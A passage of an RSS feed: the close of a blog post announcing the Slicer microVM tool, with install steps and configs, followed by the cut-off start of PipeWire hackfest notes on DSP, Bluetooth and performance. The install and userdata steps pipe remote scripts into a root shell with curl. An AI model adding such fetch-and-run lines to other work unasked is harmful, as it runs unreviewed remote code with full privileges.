&lt;/blockquote&gt;&lt;p&gt;OpenFaaS was one of the first projects I built, and it was open-source from the start. Many people remember me for that. But those were different times, and now we need to fund salaries to enable full-time R&amp;amp;D and support.&lt;/p&gt;&lt;p&gt;In a way this reaction is a good thing - there are so many free tools available for to you. With Slicer Home Edition, we self-select the people who really want to use the software and want to join a community of self-hosters, home-labbers, and cloud native developers.&lt;/p&gt;&lt;p&gt;At some point in the future, we may move Slicer Home Edition to a &amp;quot;Once&amp;quot; model, pay once and use it forever. Something like 295 USD one-off, for lifetime access.&lt;/p&gt;&lt;p&gt;If you&amp;#39;re already a sponsor, you get all of the below to play with as much as you like for free. So long as it&amp;#39;s not used at or for your work/business/dayjob.&lt;/p&gt;&lt;p&gt;Included for 25 USD / mo is:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.alexellis.io/slicer-bare-metal-preview/&quot;&gt;Slicer Home Edition&lt;/a&gt; - for developers and homelabs - slicer up bare metal into lightweight microVMs&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/alexellis/k3sup&quot;&gt;K3sup Pro&lt;/a&gt; - plan and apply K3s installations, with a terraform style approach - run in parallel&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.openfaas.com/edge/overview/&quot;&gt;OpenFaaS Edge&lt;/a&gt; - includes many of the commercial features of OpenFaaS - but licensed only for your personal, use (not at/for work)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.actuated.com/tasks/debug-ssh/&quot;&gt;Debug GitHub Actions&lt;/a&gt; jobs over SSH using the ssh gateway by &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Direct access to &lt;a href=&quot;https://insiders.alexellis.io/&quot;&gt;my sponsors portal&lt;/a&gt;, with all my past sponsors emails and 20% off my eBooks&lt;/li&gt;
&lt;li&gt;50% off a 1:1 meeting with me via Zoom for advice &amp;amp; direction in the portal&lt;/li&gt;
&lt;li&gt;Access to the private Discord server for help and discussion&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;The first five people to Tweet a screenshot of their machine running Slicer will win a limited edition SlicerVM.com Test Pilot mug. &lt;a href=&quot;https://help.printful.com/hc/en-us/articles/360014066779-Are-there-any-shipping-restrictions&quot;&gt;Shipping restrictions&lt;/a&gt; may apply.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://blog.alexellis.io/content/images/2025/09/slicer-mug.png&quot; alt=&quot;Image of the SlicerVM.com Test Pilot mug&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;The limited edition SlicerVM.com Test Pilot mug.&lt;/p&gt;
&lt;/blockquote&gt;&lt;h2&gt;Quick and dirty installation of Slicer&lt;/h2&gt;&lt;p&gt;You&amp;#39;ll need a sponsorship as mentioned above. This is used to activate your Slicer installation.&lt;/p&gt;&lt;p&gt;Within the sponsorship, you &lt;em&gt;also get&lt;/em&gt; free access to K3sup Pro with its plan and apply features that take the output from Slicer and install a multi-master HA K3s cluster all in parallel.&lt;/p&gt;&lt;p&gt;These instructions are quick - and dirty. More will follow, but the technical amongst us will have no issues overlooking this for now.&lt;/p&gt;&lt;p&gt;You will need a system with Linux installed - I recommend Ubuntu 22.04 or 24.04. Arch Linux and RHEL-like systems should also work but I can&amp;#39;t support you directly.&lt;/p&gt;&lt;p&gt;The point is that a host running slicer is dedicated to this one task, not a general purpose system with all kinds of other software installed.&lt;/p&gt;&lt;p&gt;First use the &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt; installer to install the pre-requisites. We aren&amp;#39;t using actuated here, but they share a lot of DNA.&lt;/p&gt;&lt;p&gt;In time, we&amp;#39;ll spin out a separate installer for Slicer.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;mkdir -p ~/.actuated
touch ~/.actuated/LICENSE

(
# Install arkade
curl -sLS https://get.arkade.dev | sudo sh

# Use arkade to extract the agent from its OCI container image
arkade oci install ghcr.io/openfaasltd/actuated-agent:latest --path ./agent
chmod +x ./agent/agent*
sudo mv ./agent/agent* /usr/local/bin/
)

(
cd agent
sudo -E ./install.sh
)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Next, get the Slicer binary itself:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;sudo -E arkade oci install ghcr.io/openfaasltd/slicer:latest --path /usr/local/bin&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Once you have the Slicer binary, activate it with your new or existing &lt;a href=&quot;https://github.com/sponsors/alexellis&quot;&gt;GitHub Sponsorship&lt;/a&gt;.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;slicer activate&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Any colour you want, so long as it&amp;#39;s black&lt;/h2&gt;&lt;p&gt;This phrase has been attributed to Henry Ford, and it applies to Slicer too.&lt;/p&gt;&lt;p&gt;Slicer is made for cloud development, and production workloads. It&amp;#39;s Linux only, x86_64 and Arm64.&lt;/p&gt;&lt;p&gt;We use Ubuntu LTS for all of our workstation and server deployments at OpenFaaS Ltd, so the root filesystem is Ubuntu based.&lt;/p&gt;&lt;p&gt;There is also a Rocky Linux image for those who prefer a RHEL-like experience, or need to work with RHEL/Fedora deployments for customer support.&lt;/p&gt;&lt;h2&gt;A quick template for a VM&lt;/h2&gt;&lt;p&gt;Slicer uses a YAML file to define a host group, and then a number (&lt;code&gt;count&lt;/code&gt;) of VMs to create within that group. If you start it up with a count of &lt;code&gt;0&lt;/code&gt;, then you can use the API or CLI (&lt;code&gt;slicer vm add&lt;/code&gt;) to create hosts later.&lt;/p&gt;&lt;p&gt;We&amp;#39;ll cover customisation a bit later on, but for now, let&amp;#39;s get something working - and then you can connect via SSH and customise the VM to your heart&amp;#39;s content.&lt;/p&gt;&lt;p&gt;There are various configuration options and settings for storage and networking, so I&amp;#39;m going to give you the most basic to get started with.&lt;/p&gt;&lt;p&gt;We&amp;#39;ll start by using a plain disk image, which is slower to create, but is persistent across reboots and doesn&amp;#39;t require us to consider a production ready configuration of i.e. ZFS.&lt;/p&gt;&lt;p&gt;Create &lt;code&gt;vm-image.yaml&lt;/code&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-yaml&quot;&gt;config:
  host_groups:
  - name: vm
    storage: image
    storage_size: 25G
    count: 1
    vcpu: 2
    ram_gb: 4
    network:
      bridge: brvm0
      tap_prefix: vmtap
      gateway: 192.168.137.1/24

  github_user: alexellis

  kernel_image: &amp;quot;ghcr.io/openfaasltd/actuated-kernel:5.10.240-x86_64-latest&amp;quot;
  image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd:5.10.240-x86_64-latest&amp;quot;

  api:
    port: 8080
    bind_address: &amp;quot;127.0.0.1:&amp;quot;
    auth:
      enabled: true

  ssh:
    port: 2222
    bind_address: &amp;quot;0.0.0.0:&amp;quot;

  hypervisor: firecracker&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For a Raspberry Pi 5 with an NVMe drive, or any kind of other Arm64 server, change the image and kernel as follows:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;-  kernel_image: &amp;quot;ghcr.io/openfaasltd/actuated-kernel:5.10.240-x86_64-latest&amp;quot;
-  image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd:5.10.240-x86_64-latest&amp;quot;
+  kernel_image: &amp;quot;ghcr.io/openfaasltd/actuated-kernel:6.1.90-aarch64-latest&amp;quot;
+  image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd-arm64:6.1.90-aarch64-latest&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Run the following:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;sudo -E ./slicer up ./vm-image.yaml&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The Kernel and Root filesystem will be downloaded and unpacked into containerd. These will then be used to clone a new disk of the size set via &lt;code&gt;storage_size&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;Feel free to customise the &lt;code&gt;count&lt;/code&gt; which is the number of VMs to create in the group, and the &lt;code&gt;vcpu&lt;/code&gt; or &lt;code&gt;ram_gb&lt;/code&gt; fields.&lt;/p&gt;&lt;p&gt;You can connect to the API via &lt;code&gt;http://127.0.0.1:8080&lt;/code&gt; - make sure you use the &lt;code&gt;Authorization: Bearer&lt;/code&gt; header along with the token generated on start-up.&lt;/p&gt;&lt;p&gt;The Serial Over SSH console is also available at &lt;code&gt;ssh -p 2222 user@127.0.0.1&lt;/code&gt; and is exposed on all interfaces, so you can connect to it remotely.&lt;/p&gt;&lt;p&gt;The &lt;code&gt;github_user&lt;/code&gt; field is used to pre-program an &lt;code&gt;authorized_keys&lt;/code&gt; entry for your user, so make sure your SSH keys are up to date on user profile on GitHub.&lt;/p&gt;&lt;p&gt;You will generally not SSH into a machine on the host itself, but from your laptop or workstation, or even remotely. Make sure that you read the output when Slicer starts up as it&amp;#39;ll show you how to add the route for Linux and MacOS.&lt;/p&gt;&lt;p&gt;Then whenever you&amp;#39;re ready you can connect directly to the VM over SSH using the &lt;code&gt;ubuntu&lt;/code&gt; user:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;ssh ubuntu@192.168.137.2&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You can &amp;quot;reset&amp;quot; the VM by hitting Control + C then &lt;code&gt;rm -rf vm-1.img&lt;/code&gt; followed by restarting slicer.&lt;/p&gt;&lt;p&gt;Bear in mind that the SSH host key will have changed, so run:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;ssh-keygen -R 192.168.137.2&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Running Slicer as a daemon&lt;/h2&gt;&lt;p&gt;Sometimes when we&amp;#39;re doing much longer term testing, we&amp;#39;ll set up Slicer to run as a systemd service, so when machines are powered off for the weekend (to save power) Everything is ready and waiting exactly as we left it.&lt;/p&gt;&lt;p&gt;To make slicer permanent create a systemd unit file i.e. &lt;code&gt;vm.service&lt;/code&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-ini&quot;&gt;[Unit]
Description=Slicer

[Service]
User=root
Type=simple
WorkingDirectory=/home/alex
ExecStart=sudo -E /usr/local/bin/slicer up \
  /home/alex/vm-image.yaml \
  --license-file /home/alex/.slicer/LICENSE
Restart=always
RestartSec=30s
KillMode=mixed
TimeoutStopSec=30

[Install]
WantedBy=multi-user.target&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then enable the service and start it.&lt;/p&gt;&lt;p&gt;You can have multiple slicer daemons running so long as their networking and host group names do not clash.&lt;/p&gt;&lt;h2&gt;How do I customise the image or setup userdata?&lt;/h2&gt;&lt;p&gt;The preferred way to customise an image is to supply a userdata script. Note this is not cloud-init, but a bash script. Formal cloud-init makes starting microVMs very slow which is a non-goal for us here.&lt;/p&gt;&lt;p&gt;The userdata script will run as root on first boot.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;config:
  host_groups:
  - name: vm
+   userdata: |
+      #!/bin/bash
+      echo &amp;quot;Enabling nginx&amp;quot;
+      apt-get update
+      apt-get install -y nginx
+      systemctl enable nginx --now&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Or perhaps install Docker, and make the default user able to access the daemon:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;config:
  host_groups:
  - name: vm
+   userdata: |
+      #!/bin/bash
+      echo &amp;quot;Enabling Docker&amp;quot;
+      curl -sLS https://get.docker.com | sh
+      usermod -aG docker ubuntu&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For a more permanent setup, you could simply take the root filesystem, and extend it via Docker, publish a new image and then update your YAML file.&lt;/p&gt;&lt;p&gt;i.e.&lt;/p&gt;&lt;p&gt;You could publish this new image via a CI pipeline using GitLab CI, GitHub Actions, or just a regular bash script or cron job.&lt;/p&gt;&lt;p&gt;Then update your &lt;code&gt;vm-image.yaml&lt;/code&gt; to use your new image:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;config:
  host_groups:
  - name: vm
-    image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd:5.10.240-x86_64-latest&amp;quot;
+    image: &amp;quot;docker.io/alexellis2/slicer-nginx:5.10.240-x86_64-latest&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You can also create hosts via API, passing along your custom userdata script, which is the technique I used in the Cluster Autoscaler demo above.&lt;/p&gt;&lt;h2&gt;How does Slicer compare to other tools I already know?&lt;/h2&gt;&lt;p&gt;lxd/multipass - this was the first tool I tried to use when testing large scale deployments of Kubernetes. We had already built-up experience with multipass and recommend it for testing OpenFaaS Edge / faasd CE. But it took about 3 minutes to launch each VM, and even longer to delete them. It was so painfully slow, and we&amp;#39;d already built up so much operational knowledge of microVMs through &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt;, that we decided to build our own tool.&lt;/p&gt;&lt;p&gt;incbus - a fork of lxd with lofty ambitions - many moving parts need to be understood, configured and decisions made before you can launch a VM. It&amp;#39;s designed to be general purpose and even covers its own internal clustering, which in my mind makes it the Kubernetes of VM tools - make of that what you want.&lt;/p&gt;&lt;p&gt;QEMU/libvirt - the syntax for qemu is cryptic at best, and just not built to manage multiple VMs. libvirt is living in the 90s, it requires a lot of boilerplate XML and the networking is too low level for working quickly. Unlike microVMs, QEMU can run Windows, MacOS, and other OSes.&lt;/p&gt;&lt;p&gt;Kata Containers - Kata Containers is a project designed to run individual Pods (workloads), not Kubernetes nodes within microVMs.&lt;/p&gt;&lt;p&gt;kubevirt - kubevirt is an attempt to make VMs a workload similar to Pods in Kubernetes. It is naturally slower, more cumbersome and requires a Kubernetes cluster to function. I&amp;#39;ve often seen it used in homelabs to run Windows.&lt;/p&gt;&lt;p&gt;Proxmox VE - the much beloved tool of the home-lab community, despite being something of a kitchen sink, and rather heavyweight. So if you cut your teeth on &amp;quot;click and point ops&amp;quot; and enjoy something that makes you feel like a VMware admin, then it&amp;#39;s probably a good option to consider instead of Slicer.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://actuated.com/&quot;&gt;actuated&lt;/a&gt; - managed self-hosted runners for GitHub Actions and GitLab CI, where the runners are launched in one-shot microVMs on your own cloud.&lt;/p&gt;&lt;h3&gt;Slicer is to microVMs, what Docker was to Linux namespaces&lt;/h3&gt;&lt;p&gt;Slicer is a modern alternative focused on super fast creation and deletion of microVMs. It comes with SSH preconfigured, and systemd installed, along with just enough Kernel drivers to run containers, Kubernetes, and eBPF. It&amp;#39;s fast and lean, and only does just enough for R&amp;amp;D and running production applications.&lt;/p&gt;&lt;p&gt;Slicer was written by a developer for making efficient use of large bare-metal hosts, but is equally at home on a Hetzner Robot / Auction instance, splitting up a 16 core / 128GB A102 host into 3-5 dedicated microVMs for various production applications - or a production-ready K3s cluster.&lt;/p&gt;&lt;p&gt;Slicer is a daemon, and can be run with systemd so it&amp;#39;s always there when your machine reboots.&lt;/p&gt;&lt;p&gt;Slicer comes with a Serial Over SSH console for easy out of band access. Its API can be used to add and remove hosts dynamically and rapidly for autoscaling.&lt;/p&gt;&lt;p&gt;And unlike the other tools I mentioned, Slicer is equally at home running one-shot tasks like CI jobs, autoscaled Kubernetes nodes, isolated environments for AI agents, and any other kind of serverless task.&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;Demo of one-shot / API mode&lt;/p&gt;
&lt;/blockquote&gt;&lt;h2&gt;Wrapping up&lt;/h2&gt;&lt;p&gt;The Slicer Preview is strictly licensed as a &amp;quot;Home Edition&amp;quot; for use by individuals, it is not licensed for use within or for a business - this will require a &lt;a href=&quot;mailto:contact@openfaas.com&quot;&gt;commercial agreement&lt;/a&gt;. But having said that, feel free to try it out and get back to me via Twitter &lt;a href=&quot;https://x.com/alexellisuk&quot;&gt;@alexellisuk&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Get started:&lt;/p&gt;&lt;ol&gt;
&lt;li&gt;Become a &lt;a href=&quot;https://github.com/sponsors/alexellis&quot;&gt;GitHub sponsor&lt;/a&gt; at 25 USD / mo or higher, if you are not already.&lt;/li&gt;
&lt;li&gt;Find a machine and install Linux onto it, or go to Hetzner Robot (bare metal cloud) and set up a beefy bare-metal host for 30-40 EUR / month. The &lt;a href=&quot;https://www.hetzner.com/dedicated-rootserver/ex44/&quot;&gt;Intel EX44&lt;/a&gt; is fantastic value. I also talk about the &lt;a href=&quot;https://blog.alexellis.io/n100-mini-computer/&quot;&gt;Intel N100 and other mini PCs in my recent blog post&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Email me at &lt;a href=&quot;mailto:alex@openfaas.com&quot;&gt;alex@openfaas.com&lt;/a&gt; and I&amp;#39;ll send you a Discord invite so we can talk about your use-case, help you get started, and get your feedback.&lt;/li&gt;
&lt;/ol&gt;&lt;p&gt;In the next post we&amp;#39;ll look at:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;How to run the same, but on Arm, i.e. a Raspberry Pi 5 or Asahi Linux on a Mac Mini M1 or M2&lt;/li&gt;
&lt;li&gt;How to use ZFS snapshots and clones for instant boot of new VMs, instead of static disk files&lt;/li&gt;
&lt;li&gt;How to use the &lt;code&gt;slicer vm list&lt;/code&gt;, &lt;code&gt;slicer vm top&lt;/code&gt;, &lt;code&gt;slicer vm exec&lt;/code&gt; commands&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;We have also launched a &lt;a href=&quot;https://docs.slicervm.com&quot;&gt;documentation site&lt;/a&gt; with examples such as:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Launch a large HA K3s cluster&lt;/li&gt;
&lt;li&gt;Chaos test a Kubernetes operator through its network whilst retaining serial access&lt;/li&gt;
&lt;li&gt;Run multiple isolated, production applications on a bare-metal host on Hetzner&lt;/li&gt;
&lt;li&gt;Autoscale a K3s cluster&lt;/li&gt;
&lt;li&gt;Run a K3s cluster across multiple hosts&lt;/li&gt;
&lt;li&gt;Mount a GPU with Ollama for LLMs&lt;/li&gt;
&lt;li&gt;Run Slicer on your Raspberry PI&lt;/li&gt;
&lt;li&gt;Run OpenFaaS Edge (Sponsors Edition) or faasd CE on a microVM&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Based upon your feedback, we&amp;#39;ll add more examples and changes to the CLI, REST API and configuration format.&lt;/p&gt;&lt;p&gt;Whilst you&amp;#39;re getting into things, here are a few more videos on Slicer:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/MHXvhKb6PpA&quot;&gt;Cluster Autoscaling with K3s and the Headroom Controller&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/XCBJ0XNqpWE&quot;&gt;How we use Slicer to slice up bare-metal for customer support &amp;amp; development&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/YMgrbic-8h4&quot;&gt;Mount GPUs into microVMs for LLMs &amp;amp; CI jobs with Slicer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/VhPxqlbwoXE&quot;&gt;Scaling to 15k OpenFaaS Functions with Slicer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://actuated.com/blog/firecracker-container-lab&quot;&gt;Grab your lab coat - we&amp;#39;re building a microVM from a container&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Footnotes:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;[1]&lt;/code&gt; Yes, in some Kubernetes distributions you can force the default limit above 100 slightly, but on the machine in question, even doubling that limit would not make effective use of the machine&amp;#39;s capabilities. Exercise judgement if/when increasing the limit.&lt;/li&gt;
&lt;/ul&gt;</content:encoded>
</item>
<item>
<title>Notes from the PipeWire Hackfest 2026: Part 2</title>
<link>https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-2/</link>
<guid isPermaLink="false">wF-WWMMXlzYf35WXSFh7dK1nUqjWOOMLYrJ-RQ==</guid>
<pubDate>Mon, 22 Jun 2026 19:16:33 +0000</pubDate>
<description></description>
<content:encoded>&lt;div&gt;&lt;p&gt;&lt;em&gt;(these notes are being posted in two parts to make the length more manageable, &lt;a href=&quot;https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-1/&quot;&gt;part 1 is here&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Continuing from where we left off, about topics discussed at the PipeWire hackfest in Nice…&lt;/p&gt;&lt;h3&gt;DSP features&lt;/h3&gt;&lt;p&gt;We discussed a number of features related to digital signal processing blocks which are typically realised on specialised hardware (often a DSP core that can directly interface with physical audio inputs and outputs on your laptop/phone/…).&lt;/p&gt;&lt;p&gt;There is currently no standard way for the firmware running on these DSPs to signal what features can be realised directly on DSP. We also would want to allow such features, if exposed from PipeWire, to be realisable on CPU.&lt;/p&gt;&lt;p&gt;Now we do have a way to hide away signal processing in a specific node, which is the &lt;code&gt;filter-graph&lt;/code&gt; parameter on the &lt;code&gt;audioconvert&lt;/code&gt; node that wraps all audio nodes.&lt;/p&gt;&lt;p&gt;We could extend this mechanism to allow the internal node (say the ALSA node implementation), to expose what filtering it can perform “in hardware” (i.e. the software running on DSP). This would allow the &lt;code&gt;audioconvert&lt;/code&gt; to delegate some or all processing to the internal node, with fallbacks available on the CPU.&lt;/p&gt;&lt;p&gt;We would need a number of pieces to do this, including:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Some standard definition of filters and associated parameters, so different implementations could have a standard “API” to express any given filter.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The DSP block would need to expose what features it has and how they might be used. We could imagine extending the ALSA UCM configuration to do that.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The &lt;code&gt;audioconvert&lt;/code&gt; node would need to have a way to push down &lt;code&gt;filter-graph&lt;/code&gt; params to the internal node, and negotiate what work it is doing vs. what is being delegated&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This is a non-trivial effort, but gives us some sketch of what might be possible.&lt;/p&gt;&lt;h3&gt;More DSP features&lt;/h3&gt;&lt;p&gt;In addition to standard filters, we spoke about two topics that have come up commonly in the past.&lt;/p&gt;&lt;p&gt;The first is some way to expose the processing graph in the DSP, so PipeWire and other userspace daemons have a better view of what is happening on the DSP. With the ability to push dynamic topologies to DSP, there was some renewed interest in exposing and using the ASoC DAPM widget graph. As always, the devil is in the details.&lt;/p&gt;&lt;p&gt;The second thing that came up is speaker calibration. There is a lot of processing and tuning that goes into driving speakers on modern devices as much as possible without destroying them. Some of these are one-time parameters decided at product design time, and some of these translate to runtime parameters based on voltage and current feedback from the speaker amplifier.&lt;/p&gt;&lt;p&gt;For some systems (like Qualcomm platforms), speaker calibration might be run on each system start to perform dynamic tuning. We had some discussion of how this might tie in with the rest of the system for both determining the parameters (separate startup daemon vs. in-process initialisation), as well as uploading parameters to the speaker (some ALSA UCM extensions to load parameters on PCM open but before start, or preloading parameters into ALSA kernel controls and having the driver feed them in at the right point).&lt;/p&gt;&lt;h3&gt;Volume limits&lt;/h3&gt;&lt;p&gt;A way to set a limit on the maximum volume for a given device has been a common user request ([&lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/work_items/4323&quot;&gt;1&lt;/a&gt;] [&lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/work_items/5266&quot;&gt;2&lt;/a&gt;]). We discussed the possibility of creating a per-route property (with a fallback to the node, if there are no routes), which WirePlumber could manage to provide users a simple interface to control.&lt;/p&gt;&lt;p&gt;Since the hackfest, Wim has already &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/commit/fb74ab9054cb625aeff4e271e9134b0fd0cdcfde&quot;&gt;done some work&lt;/a&gt; on this, and we need to bubble this up as a more user-accessible setting.&lt;/p&gt;&lt;h3&gt;Performance&lt;/h3&gt;&lt;p&gt;A number of performance-related topics were discussed.&lt;/p&gt;&lt;p&gt;The first was an option of a combined DSP mode, where instead of one port per channel, a node would expose one port for all the channels of the stream (but continue to run in the configured “DSP” format/rate). This would improve stream performance for non-JACK-like use-cases, especially in resource-constrained environments.&lt;/p&gt;&lt;p&gt;On the WirePlumber side, there was a discussion about using LuaJIT instead of standard Lua. There are some compatibility issues to be determined there (such as language version supported, etc.), but there might be some quick performance wins to be made if this is feasible.&lt;/p&gt;&lt;p&gt;There is a plan to move some of the WirePlumber core to Rust, and that might be a good time to also port over some of the more standard functionality that tends not to change from Lua to Rust (though that could happen in a Lua-&amp;gt;C transition and does not really need to wait on a Rust port).&lt;/p&gt;&lt;h3&gt;Declarative Session Management&lt;/h3&gt;&lt;p&gt;Another interesting, and broader, thread is the imperative nature of WirePlumber scripts – that is, policy decisions and associated action are often interwoven. It might be helpful to be able to make a clearer split where all policy decisions are first run, and then decisions are translated into actions at one go.&lt;/p&gt;&lt;p&gt;There are some historical choices that make this hard – for example, changing the profile of a device might create and destroy nodes, which makes it hard to be able to make decisions that are independent of the action. There were some ideas around redoing the profile concept such that all nodes are &lt;em&gt;always&lt;/em&gt; exposed, but nodes could get a new state to signal availability (and profiles that would allow availability to change). That might make a declarative system possible to implement.&lt;/p&gt;&lt;p&gt;We also discussed the possibility of a “transaction” system. Something that would allow a client to submit a set of objects (think links between nodes), and then “commit” that transaction. This would also help reduce the number of roundtrips between PipeWire and WirePlumber, and generally help performance.&lt;/p&gt;&lt;h3&gt;Bluetooth&lt;/h3&gt;&lt;p&gt;Being colocated with the BlueZ face-to-face meeting, we had representation from the BlueZ community, so we were able to dive into a number of topics related to Bluetooth, primarily LE Audio.&lt;/p&gt;&lt;p&gt;The first topic was Auracast, the LE Audio system for broadcast audio, allowing listeners to tune into public broadcasts in a space, or to have a device stream audio to multiple headsets concurrently for shared listening. George had a demo system showing an implementation of Auracast with PipeWire, WirePlumber and BlueZ.&lt;/p&gt;&lt;p&gt;We had some discussion of where this feature should live, and the consensus was that we would probably want a separate daemon to manage Auracast settings and loading up the appropriate nodes (either for receiving or sending) based on users’ preferences.&lt;/p&gt;&lt;p&gt;This led to a more general discussion about the current split of the Bluetooth implementation in PipeWire being SPA modules, which include streaming and some policy, and a lot more policy living inside WirePlumber. We could, and likely should, move all of this into higher level PipeWire modules instead, which could make these easier to work with overall.&lt;/p&gt;&lt;p&gt;There was also a discussion about the complexities of LE Audio, and the state of the current user experience with actual devices:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Device interop is not always great, as the spec is new, the BlueZ implementation is still being completed, and device implementations seem of variable quality&lt;/li&gt;&lt;li&gt;Reliable pairing/feature detection is hard, partly due to how BlueZ exposes the ability to talk to devices in Bluetooth Classic or Bluetooth LE modes&lt;/li&gt;&lt;li&gt;Pairing left/right pairs currently needs individual pairing, which does not seem to be needed by other implementations (Android for example)&lt;/li&gt;&lt;li&gt;Inter-device synchronisation might need some work as well&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;While there is much work to be done here, the pieces are coming together for first-class LE Audio support on Linux-based systems.&lt;/p&gt;&lt;h3&gt;Audio analytics&lt;/h3&gt;&lt;p&gt;We also spoke about “analytics” – using local neural networks to implement things like text-to-speech, speech-to-text, language translation, or other forms of processing.&lt;/p&gt;&lt;p&gt;These pose an interesting problem, because they look like a standard-ish audio stream on one side, but are effectively a sparse stream on the other side if we are talking about text. Even conversion between languages does not look like a standard filter, because the underlying model might consume a varying amount of data before generating an output, and the input and output lengths are not tightly correlated.&lt;/p&gt;&lt;p&gt;While it should be possible to implement such a system with PipeWire, it is not quite clear whether we &lt;em&gt;should&lt;/em&gt;. As the application space in this area becomes more mature, it may become clearer what the right place in the stack is for these features.&lt;/p&gt;&lt;h3&gt;Click detection and elimination&lt;/h3&gt;&lt;p&gt;We spoke about &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/work_items/4745&quot;&gt;detecting and eliminating clicks&lt;/a&gt; at the stop or start of a stream.&lt;/p&gt;&lt;p&gt;If an application is playing back audio, and suddenly stops (i.e. feeds silence, or just nothing), then the sudden drop in the signal might cause a click to be output. If you think of the corresponding waveform as representing the physical displacement of the speaker, then the drop to zero is like a sudden brake to a halt, which isn’t possible, and manifests as a jolt that you hear as a clicky noise. The same analogy holds for resuming from a pause, but in the opposite direction.&lt;/p&gt;&lt;p&gt;The solution is usually to smooth out the end of the sound by fading out, but most applications do not do this, so this problem manifests quite clearly for most browser or application streams if you listen closely.&lt;/p&gt;&lt;p&gt;Wim described a number of experiments he has done for detecting such abrupt changes in &lt;code&gt;audioconvert&lt;/code&gt;, but he was not happy with the results. We discussed some of these approaches, and what might work as acceptable tradeoffs to capture the most common cases while still trying to respect the integrity of the signal being sent by the application.&lt;/p&gt;&lt;p&gt;(sorry about the vagueness here, I missed taking more detailed notes)&lt;/p&gt;&lt;h3&gt;Miscellanea&lt;/h3&gt;&lt;p&gt;The rest of the discussion covered disparate topics that I don’t have long form notes on:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Hardware profiles: Shipping hardware-specific configuration for PipeWire and WirePlumber is hard. We discussed some approaches using context properties and conditions, but this is an area that needs more work.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Data loop management: PipeWire allows splitting work across data loops so different nodes in a graph can be assigned to different threads. This is currently an all-or-nothing system, where either all nodes go to a single data loop, or every node 